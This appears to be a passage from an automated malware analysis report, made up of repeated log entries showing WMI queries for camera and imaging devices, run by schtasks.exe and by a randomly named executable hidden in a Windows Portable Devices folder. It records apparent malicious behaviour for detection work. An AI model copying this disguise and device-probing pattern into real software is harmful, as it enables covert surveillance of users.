                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
